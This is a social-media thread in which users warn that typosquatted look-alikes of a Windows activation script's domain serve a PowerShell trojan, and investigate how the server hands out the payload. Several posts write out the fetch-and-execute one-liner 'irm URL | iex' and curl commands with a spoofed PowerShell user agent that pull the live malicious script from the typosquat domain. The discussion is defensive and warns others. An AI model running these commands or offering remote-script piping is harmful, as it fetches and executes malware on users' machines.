Conversation

PSA if you ran "irm https://get.activated.win | iex" but instead of activated you typed in actvated or actrivated you have been ratted and should reset your pc

12
4
1
@reiddragon @tim it looks like yeah, however it seems like visiting it through a browser it redirects to the real thing, I will check on VM
4
2
0

@luna @reiddragon it checks if the user agent is powershell and if it isn't it redirects to the real thing

2
1
0

@reiddragon @tim can confirm, it downloaded a file which ends with iex (irm https://get.activated.win) and the rest of the script downloads Update.zip

2
2
0

@tim Woah, that's actually crazy. Wild, honestly.

Clever as fuck, if I'm being honest lol but still, hella wrong & I feel for those it may have impacted.

0
1
0

π’Žπ’–π’“π’‚π’”π’‚π’Œπ’Šπ’π’π’Œπ’Šπ’•π’”π’–π’π’†

@tim this is why people should copy Commands directly from the Website

1
0
0

@murasakinokitsune @tim It's for this exact reason I read into anything I run via commands from sources like this & as you've said, copy directly.

It's just never worth the risk, especially not over impatience.

1
1
0

@luna @reiddragon @tim seems like their dns is cloudflare and they use tucows as a registrar, probably can get them taken down if we all submit abuse reports

2
0
0
@stag @reiddragon @tim ohhh right we should send an abuse report to the registrar
I'll try that rq
1
2
0

If you want to check if you got infected check the following folder: "C:\Windows\SystemHealth\Update"

2
1
0
@stag @reiddragon @tim alright I submitted an abuse report for both domains
0
2
0

Maddy πŸ³οΈβ€βš§οΈ - Floofy fops waff neofox_floof

@tim Are you able to elaborate? I wouldn’t be surprised if this is a thing, but trying to curl or go to the incorrect URLs myself gives me a 301 Moved Permanently and takes me to get.activated.win

2
0
0

@tim @luna @reiddragon SHEESH. now I'm gonna think about that every time I'm prereading/reviewing a curl+bash

1
0
0

Maddy πŸ³οΈβ€βš§οΈ - Floofy fops waff neofox_floof

@kopper @tim No difference for me using something like Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.8457

2
0
0

Maddy πŸ³οΈβ€βš§οΈ - Floofy fops waff neofox_floof

@noisytoot @tim Wasn’t able to recreate using WindowsPowerShell user agents from Windows 10 or 11. neofox_woozy

0
0
0

Maddy πŸ³οΈβ€βš§οΈ - Floofy fops waff neofox_floof

@luna @reiddragon @tim I’m curious enough to try this out in a VM as well. I can’t seem to get it to trigger by simply using a WindowsPowerShell user agent with curl. neofox_woozy

2
0
0
curl link that downloads malware - be careful!
Show content

@maddy @reiddragon @tim I managed to trigger it using a PowerShell regex that literally came up in the DuckDuckGo AI summary of all places

curl -A "Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/3.0" https://get.actvated.win

1
2
0
@maddy @tim @luna I wonder if powershell on Linux is enough to trick it to hand over the payload?
0
0
0
@luna @tim on curl both seem to return an nginx 302 placeholder page
1
0
0

@stag @luna @reiddragon @tim cloudflare’s abuse report form is broken and not letting me submit a report. I did send one to the registrar though

1
0
0

@syphist @luna @reiddragon @tim seems to have worked for me, which form are you using? maybe its an adblock or referer issue

1
0
0

Maddy πŸ³οΈβ€βš§οΈ - Floofy fops waff neofox_floof

RE: curl link that downloads malware - be careful!
Show content

@luna @reiddragon @tim Ahh, there we go. Turns out the β€˜https’ made the difference. The same user agents I was trying actually work and bring up the malicious script when I add https:// to the URL, which I didn’t have before. neofox_woozy

1
0
0
@maddy @reiddragon @tim the real thing expects you to run it using HTTPS as well if I recall. It didn't let me download it last time
0
2
0

@tim perhaps clarify what exactly to check?

also, is this related to the old https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/, or is it a new unrelated typosquat?

1
0
0

@tim so telling people to do the windows equivalent of piping from curl to bash was not such a good idea after all heh

0
0
0

@maddy @kopper @tim huh

> curl --user-agent "Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/3.0" https://get.actvated.win

returned the malicious payload for me that would download some Update.zip from another mispelled domain

0
0
0

Maddy πŸ³οΈβ€βš§οΈ - Floofy fops waff neofox_floof

@kopper @tim Nevermind. It worked when I used https:// with the url, which I wasn’t doing initially. neofox_googly_woozy

0
0
0
re: malware link
Show content

@luna @reiddragon @tim https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/ yeah, not the first time

i recall watching a video about it from eric parker but it seems to be gone now

tl;dr people really need to be aware that iex is an insanely powerful command (it simply runs a script from a remote resource)

0
0
0

@tim Typosquatting, huh ? Simple, but effective.

0
0
0
@tim this is why i dislike curl to bash (and the powershell equivalents in this case)
0
0
0

π’Žπ’–π’“π’‚π’”π’‚π’Œπ’Šπ’π’π’Œπ’Šπ’•π’”π’–π’π’†

@Zackary @tim eyuup

0
0
0

@tim OH MY GOD I THOUGHT THIS MEANT THE REAL ONE GOT RATTED

0
0
0

@stag @tim @reiddragon @luna turns out the form was really abtuse, the captcha broke, and their β€œtoo many requests” time out was way too quick to block me

0
0
0

@tim detection of the downloaded Update.zip is pretty poor too at time of writing, virustotal reporting just 6 engines detecting a trojan

https://www.virustotal.com/gui/file/de110057a26ba10cf1c9071744e4cdcae347746dbf2528296d7b6dc2a923cf4c

0
0
0
windows users finding out why curl | bash is stupid
1
3
0

@sleepybisexual I'm guessing someone's typosquatting the activated.win domain, and putting some sort of malicious PowerShell script there.

irm is a PowerShell command called Invoke-RestMethod and makes a web request to an address, and iex is Invoke-Expression, which executes a PowerShell script from a string. That means, if you can serve a malicious PowerShell script at address https://bad.website, the command irm https://bad.website | iex will download and immediately execute said script.

@tim

0
0
0

@snow @chjara Ask for Genuineβ„’ Software

1
0
0

@snow @chjara please put this on the home page

0
0
0

@risc Updated the original post to make it more clear what should be checked. I am not sure if this case is related to the old typosquat as i was not aware of it.

0
0
0

@reiddragon @luna @tim I assume they check that you're actually using the power shell user agent

1
0
0
@tay @luna @tim yeah, they do, someone else pointed it out in another reply
0
0
0

@pomagarnet
Best strat is to curl to a temp file, read file, then run file.
@tim @luna @reiddragon

0
0
0